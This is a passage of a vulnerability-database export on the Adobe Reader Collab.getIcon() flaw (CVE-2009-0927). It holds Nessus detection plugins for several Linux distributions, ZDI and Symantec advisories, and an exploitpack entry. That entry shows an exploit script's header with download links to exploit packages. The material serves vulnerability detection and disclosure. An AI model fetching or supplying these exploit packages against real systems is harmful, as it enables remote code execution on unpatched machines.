script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/acroread\", unaffected:make_list(\"ge 8.1.4\"), vulnerable:make_list(\"lt 8.1.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Reader\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:04", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : acroread (acroread-689)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:acroread"], "id": "SUSE_11_1_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/40182", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-689.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40182);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-689)\");\n script_summary(english:\"Check for the acroread-689 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-8.1.4-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:59", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : acroread (acroread-689)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:acroread"], "id": "SUSE_11_0_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/39906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-689.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39906);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-689)\");\n script_summary(english:\"Check for the acroread-689 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-8.1.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:42:54", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "edition": 24, "published": "2009-03-27T00:00:00", "title": "openSUSE 10 Security Update : acroread (acroread-6120)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-03-27T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:acroread"], "id": "SUSE_ACROREAD-6120.NASL", "href": "https://www.tenable.com/plugins/nessus/36033", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-6120.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36033);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE 10 Security Update : acroread (acroread-6120)\");\n script_summary(english:\"Check for the acroread-6120 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"acroread-8.1.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:41", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 690)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread"], "id": "SUSE_11_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/41362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41362);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n\n script_name(english:\"SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 690)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0193.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0658.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0927.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0928.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1061.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1062.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 690.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-8.1.4-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe AcrobatReader 7.1.18.1.39.1 - Collab getIcon Universal", "edition": 1, "published": "2009-09-03T00:00:00", "title": "Adobe AcrobatReader 7.1.18.1.39.1 - Collab getIcon Universal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-09-03T00:00:00", "id": "EXPLOITPACK:A99632279EAE4DA17D8EAF0E27E2511B", "href": "", "sourceData": "#!/usr/bin/env python\n#\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\n# evil_pdf.py, tested on Operating Systems:\n# Windows XP SP3 English/French\n# Windows 2003 SP2 English\n# with Application versions:\n# Adobe Reader 9.0.0/8.1.2 English/French\n# Test methods:\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.\n# [Coromputer] raised from the ashes.\n#\n\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9579.zip (2009-CVE-2009-0927_package.zip)\n\n# milw0rm.com [2009-09-03]", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:04", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file. The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow. If successfully exploited full control of the affected machine running under the credentials of the currently logged in user can be achieved.", "modified": "2009-06-22T00:00:00", "published": "2009-03-24T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-014/", "id": "ZDI-09-014", "title": "Adobe Acrobat getIcon() Stack Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-13T12:07:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-0927"], "description": "### Description\n\nAdobe Acrobat and Reader are prone to a remote code-execution vulnerability because the software fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users. The issue affects the following: Reader and Acrobat 7.1 and prior Reader and Acrobat 8.1.2 and prior Reader and Acrobat 9 UPDATE (March 24, 2009): This BID was previously titled 'Adobe Acrobat and Reader Unspecified JavaScript Method Remote Code Execution Vulnerability', but has been updated to better document the issue.\n\n### Technologies Affected\n\n * Adobe Acrobat Professional 7.0.0 \n * Adobe Acrobat Professional 7.0.1 \n * Adobe Acrobat Professional 7.0.2 \n * Adobe Acrobat Professional 7.0.3 \n * Adobe Acrobat Professional 7.0.4 \n * Adobe Acrobat Professional 7.0.5 \n * Adobe Acrobat Professional 7.0.6 \n * Adobe Acrobat Professional 7.0.7 \n * Adobe Acrobat Professional 7.0.8 \n * Adobe Acrobat Professional 7.0.9 \n * Adobe Acrobat Professional 7.1 \n * Adobe Acrobat Professional 8.0 \n * Adobe Acrobat Professional 8.1 \n * Adobe Acrobat Professional 8.1.1 \n * Adobe Acrobat Professional 8.1.2 \n * Adobe Acrobat Professional 8.1.2 Security Update 1 \n * Adobe Acrobat Professional 9 \n * Adobe Acrobat Standard 7.0.0 \n * Adobe Acrobat Standard 7.0.1 \n * Adobe Acrobat Standard 7.0.2 \n * Adobe Acrobat Standard 7.0.3 \n * Adobe Acrobat Standard 7.0.4 \n * Adobe Acrobat Standard 7.0.5 \n * Adobe Acrobat Standard 7.0.6 \n * Adobe Acrobat Standard 7.0.7 \n * Adobe Acrobat Standard 7.0.8 \n * Adobe Acrobat Standard 7.1 \n * Adobe Acrobat Standard 8.0 \n * Adobe Acrobat Standard 8.1 \n * Adobe Acrobat Standard 8.1.1 \n * Adobe Acrobat Standard 8.1.2 \n * Adobe Acrobat Standard 9 \n * Adobe Reader 7.0.0 \n * Adobe Reader 7.0.1 \n * Adobe Reader 7.0.2 \n * Adobe Reader 7.0.3 \n * Adobe Reader 7.0.4 \n * Adobe Reader 7.0.5 \n * Adobe Reader 7.0.6 \n * Adobe Reader 7.0.7 \n * Adobe Reader 7.0.8 \n * Adobe Reader 7.0.9 \n * Adobe Reader 7.1 \n * Adobe Reader 8.0 \n * Adobe Reader 8.1 \n * Adobe Reader 8.1.1 \n * Adobe Reader 8.1.2 \n * Adobe Reader 8.1.2 Security Update 1 \n * Adobe Reader 9 \n * Gentoo Linux \n * Nortel Networks Self-Service - CCSS7 \n * Nortel Networks Self-Service MPS 1000 \n * Nortel Networks Self-Service Peri Application \n * Nortel Networks Self-Service Peri Workstation \n * SuSE Linux Desktop 10 \n * SuSE Novell Linux Desktop 9.0.0 \n * SuSE Suse Linux Enterprise Desktop 10 SP2 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE openSUSE 10.3 \n * SuSE openSUSE 11.0 \n * SuSE openSUSE 11.1 \n * Sun Solaris 10 Sparc \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references for details.\n", "modified": "2009-03-18T00:00:00", "published": "2009-03-18T00:00:00", "id": "SMNTC-34169", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/34169", "type": "symantec", "title": "Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution 